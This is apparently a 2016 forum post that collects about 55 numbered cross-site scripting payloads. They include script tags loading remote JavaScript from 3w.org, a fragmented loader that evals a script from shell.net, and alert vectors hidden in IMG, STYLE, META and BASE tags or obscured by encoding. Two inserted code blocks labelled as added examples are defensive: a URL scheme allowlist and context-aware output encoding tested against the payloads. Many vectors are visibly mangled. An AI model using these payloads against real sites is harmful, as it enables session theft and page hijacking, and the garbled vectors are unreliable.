XSS attack round-up

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Unusual ways to pop an alert
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect in China, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=\'#\'"   javascript:alert('XSS');">
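Items (3) through (19) and (40) all exploit the same gap: a filter that searches an attribute value for the literal string "javascript:" after the point where the browser has already decoded character references, discarded control characters and folded case. The gate below is an added example and is not code from the original post. It canonicalises a URL value roughly the way a browser does (one pass of numeric and named entity decoding, removal of control characters and spaces, lower-casing) and only then checks the scheme against an allowlist. The NAMED_ENTITIES table, the SAFE_SCHEMES set and the test URLs are this example's own choices; the control-character stripping is deliberately stricter than the WHATWG URL parser, as the comments note.

```javascript
// Added example, not from the original post: a URL-attribute gate that
// canonicalises an attacker-controlled href/src the way the HTML and URL
// parsers would, then checks the scheme against an allowlist.

// A few named references an attacker can use to hide a colon or whitespace.
// Assumption: this short table is enough for a gate; the full HTML5 table
// has over two thousand names.
const NAMED_ENTITIES = {
  tab: '\t', newline: '\n', colon: ':', amp: '&', lt: '<', gt: '>', quot: '"',
};

// Decode one layer of character references. Decimal and hex numeric
// references are accepted with or without the trailing semicolon and with
// leading zeros, because HTML parsers accept them that way (items 5, 8-10).
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const cp = body[1].toLowerCase() === 'x'
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// Canonical form used for the scheme check: entity-decode once (browsers
// decode an attribute value once, so "&amp;#106;" stays inert), drop every
// C0 control, space and DEL anywhere in the string, then lower-case.
// Dropping all controls everywhere is deliberately stricter than the WHATWG
// URL parser, which strips C0/space only at the ends and removes only
// tab/LF/CR from the middle; the stricter rule also covers the embedded NUL
// of item 17 and the leading spaces of item 19 without per-case code.
function canonicalizeUrl(raw) {
  return decodeEntities(raw).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
}

// Schemes this gate lets through; everything else (javascript:, vbscript:,
// data:, ...) is rejected. Assumption: the application needs only these.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrl(raw) {
  const url = canonicalizeUrl(raw);
  const scheme = /^([a-z][a-z0-9+.-]*):/.exec(url);
  // No scheme: a relative or scheme-relative URL, which inherits the
  // page's http(s) scheme and cannot become javascript:.
  if (scheme === null) return true;
  return SAFE_SCHEMES.has(scheme[1]);
}

// Constructed test vectors mirroring items 3-19 and 40, plus benign URLs.
const VECTORS = [
  ["javascript:alert('XSS')", false],                                   // item 3
  ["JaVaScRiPt:alert('XSS')", false],                                   // item 4
  ["&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", false], // item 5
  ["&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", false], // item 9
  ["&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74('XSS')", false], // item 10
  ["jav&#x09;ascript:alert('XSS')", false],                             // item 11
  ["jav&#x0A;ascript:alert('XSS')", false],                             // item 13
  ["jav&#x0D;ascript:alert('XSS')", false],                             // item 14
  ["java\u0000script:alert(\"XSS\")", false],                           // item 17
  ["   javascript:alert('XSS')", false],                                // item 19
  ["javascript&colon;alert('XSS')", false],
  ["vbscript:msgbox(\"XSS\")", false],                                  // item 40
  ["data:text/html,<script>alert(1)</script>", false],
  ["http://3w.org/XSS/xss.js", true],
  ["//3w.org/XSS/xss.js", true],
  ["/search?q=1&copy=2", true],
  ["#top", true],
];

// One boolean per vector: true when the gate agrees with the expectation.
function runVectors() {
  return VECTORS.map(([url, expected]) => isSafeUrl(url) === expected);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runVectors().every(Boolean) ? 'all vectors classified as expected' : 'MISMATCH');
}
```

Because the gate only returns a verdict and never writes the canonical form back into the page, over-decoding (for example treating "&lt" without a semicolon as a reference, which an HTML parser would not do inside an attribute when "=" follows) can only produce a false rejection, never a bypass.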

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
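Items (6), (23), (29) and (30) are breakouts: the value closes the attribute, the tag or the JavaScript string literal it was placed in. Item (29) in particular defeats the common mistake of escaping only the quote character, because the attacker's own backslash swallows the added one. The code below is an added example and not from the original post; it shows per-context output encoding that contains all four payloads, next to the naive quote-escaper that item (29) breaks. The page template, the PAYLOADS table and the helper names are this example's own constructions.

```javascript
// Added example, not from the original post: context-aware output encoding
// that neutralises the breakout payloads of items 6, 23, 29 and 30, beside
// the "escape the quotes only" mistake that item 29 defeats.

// HTML text and attribute context: entity-encode everything that is not an
// ASCII alphanumeric, so the value can neither open a tag (items 23, 30)
// nor close a quoted attribute (item 6).
function encodeForHtml(s) {
  return s.replace(/[^A-Za-z0-9]/gu, c =>
    '&#x' + c.codePointAt(0).toString(16) + ';');
}

// JavaScript string-literal context: \xHH for every non-alphanumeric
// character below U+0100, \uHHHH for the rest. A backslash becomes \x5c
// and a quote \x22, so the literal can never be terminated early.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/gu, c => {
    const cp = c.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0');
    return Array.from(c, ch =>
      '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')).join('');
  });
}

// The mistake item 29 targets: escaping only the double quote.
//   input   \";alert('XSS');//
//   output  \\";alert('XSS');//
// The attacker's backslash now escapes the added backslash, and the quote
// that follows ends the literal.
function naiveQuoteEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Index of the first unescaped double quote after the opening one, or -1.
// For an intact literal this is the literal's last character.
function closingQuoteIndex(literal) {
  for (let i = 1; i < literal.length; i++) {
    if (literal[i] === '\\') { i++; continue; }
    if (literal[i] === '"') return i;
  }
  return -1;
}

// Embed an untrusted value in a double-quoted JS literal using the given
// escaper and report whether the literal survives as written.
function embedInJsString(value, escape) {
  const literal = '"' + escape(value) + '"';
  return { literal, intact: closingQuoteIndex(literal) === literal.length - 1 };
}

// Constructed page template (not from the original post) that places the
// same untrusted value in a title, an attribute, text and a script.
function renderPage(value) {
  return [
    '<title>' + encodeForHtml(value) + '</title>',
    '<div title="' + encodeForHtml(value) + '">' + encodeForHtml(value) + '</div>',
    '<script>var v = ' + embedInJsString(value, encodeForJsString).literal + ';</script>',
  ].join('\n');
}

// Payloads taken from items 6, 23, 29 and 30 of the list above.
const PAYLOADS = {
  attrBreakout: '"><SCRIPT>alert("XSS")</SCRIPT>">',
  doubleBracket: '<<SCRIPT>alert("XSS");//<</SCRIPT>',
  escapedEscape: '\\";alert(\'XSS\');//',
  endTitle: '</TITLE><SCRIPT>alert("XSS");</SCRIPT>',
};

// True when, for every payload, the rendered page still contains exactly the
// six tags of the template and the JS literal is intact.
function allPayloadsContained() {
  return Object.values(PAYLOADS).every(p => {
    const tagsOpened = (renderPage(p).match(/<[A-Za-z/]/g) || []).length;
    return tagsOpened === 6 && embedInJsString(p, encodeForJsString).intact;
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(embedInJsString(PAYLOADS.escapedEscape, naiveQuoteEscape));
  console.log(embedInJsString(PAYLOADS.escapedEscape, encodeForJsString));
  console.log(allPayloadsContained() ? 'all payloads contained' : 'BREAKOUT');
}
```

The encoded literal still evaluates back to the attacker's original bytes, which is the point: the data survives unchanged as data, it just cannot change the parser's context.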
(31) Input image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>